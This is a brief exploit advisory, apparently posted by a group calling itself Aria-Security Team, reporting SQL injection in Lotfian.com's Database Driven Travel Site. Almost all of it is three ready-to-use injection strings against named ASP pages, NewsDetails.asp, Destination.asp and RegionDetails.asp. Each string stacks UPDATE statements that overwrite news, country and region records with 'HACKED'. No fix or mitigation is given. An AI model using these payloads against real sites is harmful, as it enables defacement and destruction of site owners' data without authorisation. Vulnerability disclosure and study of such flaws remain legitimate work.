The Lotfian.com Database Driven Travel Site suffers from a SQL injection vulnerability.
cd0c6d06b52fa03772b28e2f9bdad6910e4d3b644783cfd52eec50b2e4858fc5
Aria-Security Team
http://Aria-Security.Net
-----------------------------
DATABASE DRIVEN TRAVEL SITE
Vendor: Lotfian.com
NewsDetails.asp?NewsID=''UPDATE gtsNews set NewsDescription='HACKED' UPDATE gtsNews set NewsTitle='HACKED'
Destination.asp?CID=''UPDATE gtsCountry set CountyName='HACKED'
RegionDetails.asp?CID=''UPDATE gtsCountryRegion set CountryRegionName='hacked';--